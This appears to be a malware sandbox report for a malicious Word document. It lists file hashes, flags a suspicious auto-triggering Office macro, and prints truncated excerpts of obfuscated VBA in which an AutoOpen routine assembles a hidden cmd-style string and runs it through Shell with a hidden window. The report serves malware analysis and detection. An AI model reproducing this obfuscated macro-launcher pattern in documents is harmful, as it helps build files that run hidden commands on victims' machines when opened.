Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318

  • Size

    124KB

  • MD5

    b6e13c6a1d437ed02509be01dd334983

  • SHA1

    a12ee91c820278590d58f0f846067992c1aa1053

  • SHA256

    0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318

  • SHA512

    8bfc1ffaaa45a8d7f6add5c51e7d1e8e62c95b71b7f76905e3a497f9957227991cd7eef477bc073483d375a3dadaef46d2d7e7376ed170a636fcd194b5836cba

  • SSDEEP

    1536:mptJlmrJpmxlRw99NBq+a9Mctk0bARn03mhE7M7L1HbCmnrlL8gfvQ:Kte2dw99fBcTS03r7UL1HempL8gw

Malware Config

Signatures

  • Office macro that triggers on suspicious action 1 IoCs

    Office document macro which triggers in special circumstances - often malicious.

  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

Files

  • 0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318
    .doc windows office2003

    XjfLisDjucS

    1
    Attribute VB_Name = "XjfLisDjucS"
    2
    Attribute VB_Base = "1Normal.ThisDocument"
    3
    Attribute VB_GlobalNameSpace = False
    4
    Attribute VB_Creatable = False
    5
    Attribute VB_PredeclaredId = True
    6
    Attribute VB_Exposed = True
    7
    Attribute VB_TemplateDerived = True
    8
    Attribute VB_Customizable = True
    9
    Sub AutoOpen()
    10
    Dim LiHOou(1)

    XpzIKKTGQiwv

    1
    Attribute VB_Name = "XpzIKKTGQiwv"
    2
    Function dSEYjani()
    3
    QGhAKfV = "d \/ // //" + "// / \ / /V:" + "O/C" + """" + "set ]}*~=027a 0" + "72a 07a2 0a72 207"
    4
    ZiKwMnYW = "a 2a70 0a72 270a" + " 72a0 7a02 a" + "027 a207 02"
    5
    Dim jqzRY(1)
    6
    jqzRY(0) = MidB(tQiQXv + COZOzUwvOSWwXoiiun + CtiHaoHO, 488, 205) + Left(NQNZEMuC + GSWRGpNrPBWWwuHnzt + YlGaJd, 653)
    7
    Dim iREfn(2)
    8
    iREfn(0) = Right(YwBqjd + AmktXivcbWUGncpsK + YSjAZKiX, 742) + Right(YZbroTj + cEQTOiONtlJYLOWEJRE + liQfw, 777) + Right(AaNUB + rSPJtZYNMYbwcAEFijSMS + ZJwwuR, 3) + MidB(qBuvm + CSXNZjzpEviFZkVzOBPRH + PKCdT, 374, 409)
    9
    iREfn(1) = Mid(tvMwqK + pVVinEKamzhmmMToTM + JHJMCYX, 172, 83) + MidB(clFhb + StjXQdsilWVJwEWiYCm + tIfYiji, 851, 298) + Left(qvmqfTXw + iPKXttKBvfqDdIwsGiGnCOz + wEfoRrL, 870) + Right(lnTvO + zsIihzFiIcbHTiwwQrZM + dSOFmj, 847)
    10
    Dim ownPlI(2)

    psiKPThAkow

    1
    Attribute VB_Name = "psiKPThAkow"
    2
    Function kWOmnIjtktpw(YqJJMEHMws As String)
    3
    Const voEQJiB = 0
    4
    Dim jnVVqJ(2)
    5
    jnVVqJ(0) = Right(ZCQsod + UVvzFrTiPzQYQuInVdtc + dPBJdom, 515) + Left(cwMooU + aLDwuOzfqGlbtSLRKFaLpw + SiUwA, 534) + Mid(QihUn + JvUouijNMCrhOwmDh + sFJUr, 28, 567) + MidB(iBaRQ + NclhGwkZBQTibPzDOia + XTFYqHi, 695, 861)
    6
    jnVVqJ(1) = Right(awhEGH + qkJLYuZKMGinlGfZuRTjbt + fhtwG, 104) + MidB(uNHji + OXlKlopXbhidWEOktdaP + HkMzjw, 914, 574) + Left(IpjYU + cVZaBqfpRtWTlkdDd + cmAIRvt, 667) + Right(DSwubw + WSrhCBRADwMkrtmZ + ulGbd, 365)
    7
    Dim OjiVM(2)
    8
    OjiVM(0) = Left(wbthMQO + asYIYswqKTnABMovm + RMKcNzwz, 989) + Right(pKvZnzF + iCQlOosAcSNniawvtBtKOR + FbZqqwn, 337)
    9
    OjiVM(1) = Left(YNZGRzXm + jUOoBujkrCLnDbmb + MLPZiWnj, 917) + Mid(zrwkNko + EjXuENTOWlKFDwPSmG + EaWcPCpr, 953, 882)
    10
    Shell% YqJJMEHMws, voEQJiB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.